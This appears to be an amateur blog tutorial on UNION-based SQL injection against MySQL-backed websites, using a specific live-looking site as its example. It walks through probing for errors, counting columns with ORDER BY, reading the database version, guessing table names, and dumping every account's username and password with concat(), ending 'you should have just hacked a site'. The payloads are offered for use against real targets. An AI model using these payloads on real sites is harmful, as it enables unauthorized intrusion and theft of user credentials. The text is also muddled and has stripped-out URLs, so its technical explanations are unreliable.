Now, on this particular url, when you add the magical character ' you should get an error message, something simaler to this:

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/buysell/domains/ on line 57
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\'' at line 1
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/buysell/domains/ on line 424

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/buysell/domains/ on line 85
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND std_items.cat_id=std_categories.cat_id LIMIT
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/buysell/domains/ on line 143

now remember, this is very vauge. It can be almost anything, as long as it mentions MySQL. If it mentions some random crap about vb its not vulnerable (AS FAR AS I KNOW)

now when you get that error your in buisness. This means your target site, or the site im using as an example, is vulnerable! HURRAY! now you can get to the hacking

ok next you need to find the number of columns. This i dont fully understand myself, like i said, i am an uber noob.
I THINK what the columns are, are the columns of data inside a chart. Like a chart stored within the database, that can hold like, usernames , or passwords. Anyhow you need to find out how many there are (how many columns for what chart? wtf im confused too, you just have to do it)

ok; to find the amount of charts, you have to use the statement in SQL which is" order by" , this tells the database how to order the results (im still confused, your not alone)

now, in the url, delete you magical character ' i know, it dosent deserve it, but do you want to hack or not? ok now the url is once again
Now, add the "Order by" command to the end
so the url should look like: order by
now to find out the number of coloums, you would add a one to "Order by" so it would become "Order by 1"
now, the url is : order by 1
but thats not all. You need to add some characters at the end, which tell the database that it is a query, and not you trying to connect to another page of the site. To do this, you use one of the following" -- " or " /* " these denote that the text is a comment. These are used in programming when you need to write yourself something to remember inside your code, or script.
it dosent matter what it is for, if you dont understand, you just need to know when to use it.

so add either -- or /* to the end of your url

(there are two different methods, because some servers block one of the methods, so if one of the comment symbols* -- * or * /* * dont work, try the other one. i personally prefer -- its faster

the url is now: order by 1--
OR order by 1/*

make sure not to leave a space between your 1 and your -- or /*
now the first time, it is not going to work obviously.
To find out the number of columns, you need to increase the number "1" by 1 every time you try

so the first time you would make the url: order by 1/*
second time: order by 2/*
third time: order by 3/*

and so on and so on, untill you encounter ANOTHER error. It should say something about mysql.
now you know the number of coloums. Lets say it took you 5 tires, on the fifth try, there was an error, then you have 4 columns, because the 5th try is an error, that means the column does not exist in this table (a table located inside the database)
now, you have the amount of columns, which is great.

Now we have to use the UNION function, which allows you to select more data within one sql statment. The statment in this case being what you add to the end of the url(hope your not lost)
Now when we use the union function, the syntax (how we use it, where we use it) is like so: union all select
but we want it to look like this: union all select 1,2/*
what this does is select the columns in the table, column 1,2,3 and column 4
now of course, you only want to select the number of columns that you have determined exist. In my example, i determined 4.
Therefore, i selected column 1,2,3 and 4.
to tell if this command is working, look for numbers on the webpage, that werent there before. The numbers could be 1 or any number up to the amount of columns you found. So if there were 8 columns, the new number could be anywhere from 1-8.

Now you need to check for the mysql version. This is important, because if it is version 5, you job will be ALOT esier
now this part is sometimes tricky. Look to find the new number that appeared. Now, in your url
which should look like: union select all 1,2/*
you need to replace the number in the url that matches the number that appeared on the web page (so if the number that appeared is 2, then you replace the 2 in "union select all 1,2/*"

what you replace it with is:
@@version or version() if @@version yeilded no results.

we should get someting like 4.1.33-log or 5.0.45 or similar.
it should look like this: union all select 1,@@version/*
if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."
what we need is convert() function

i.e. union all select 1,convert(@@version using latin1)/*

(yeah, im confused too, dont worry, you might not have to use this)

or with hex() and unhex()

i.e. union all select 1,unhex(hex(@@version))/*

and you will get the MySQL version :D
The numbers telling you the version will appear on the web page, most lilkey where the other number appeared.

Now, one of the hardest parts, you need to find out the name of the table in which you wish to see the information of. Be it the table that stores passwords, or usernames, or both. you need to find out. This part can come down to guessing. But remember, always make an educated guess. Dont guess something random like spongepurple guess something like password or pswrd or user_name or user_names, you catch my drift? so in order to guess the name, use a syntax like this: union all select 1,2 from randomguess/*
on this site, i know for a fact, that the user name table is union all select 1,2 from std_users/*

std means standard

now, you should get MORE numbers. But what do you do with them? you need to extract (put the data into a readable format)
the data. To do this, you need the column name. On this site, and on lots more sites, you can get a rough idea of what the column name is by reading the source of the webpage. The source, is the coding. you can read this by right clicking on the page and hit "Veiw Source Code". Now you need to find the register coding
to do this you might have to open up a new internet clien (have to internets running at once) or on firefox, another tab.
On your second internet, go to the "Creat account" page and veiw the source
on This website, the code is as follows:

<INPUT TYPE="TEXT" NAME="new_user_name" value="" SIZE="15">
<tr><td valign="top" align="right">
<FONT CLASS="small">
<td valign="top" align="right">
<INPUT TYPE="PASSWORD" NAME="password1" value="" SIZE="15">

here we can clearly see the words "new_user_name" and "password1"
from "new_user_name" im going to keep "User_name" because that seems logical

now to see if im right, i will need to check union all select 1,user_name,2 from std_users/*

notice where i put "user_name" i put it inbetween the two columns, column 1 and column 2. Then i made sure to state WHERE i am selecting this data (from the column named "user_name") from, the std_users table. and VIOLA! you have every single account user name registered on the site. But now, we need the password.

now before, when we looked at the source code, we saw two interesting things, "New_user_name" and "password1"
now we need the "password1"
i will get rid of the one, because why would the column name have a 1 in it?
so basicially, you do the same thing that you did with the user names. union all select 1,user_name,2 from std_users/*
but instead of that, its: union all select 1,password,2 from std_users/*
and ONCE AGAIN! VIOLA! you now have the password to each and every account on the site.

but the lesson is not over, now, to make it easier, we will reformat your results, so they can be better read.

to do this, simply use the contact function. union all select 1,concat(user_name,0x3a,password),2 from std_users/*

what this does, in a sense, is contact thoes columns from the chart you specify (in this case std_users) and displays there information, but, now, you can display them both at the same time, because they are being simotaneously contacted. And, in this context, it syncronizez the username to its password like so:


the 0x3a is just a hex code, it is equal to a colon, so your results will look nice.
and thats all.
If you have done this right, you should have just hacked a site.

for your first time, try on its easy :P
on, make sure to use /* comment symbol!

Read More 1 Comment

Copyright © Amazing.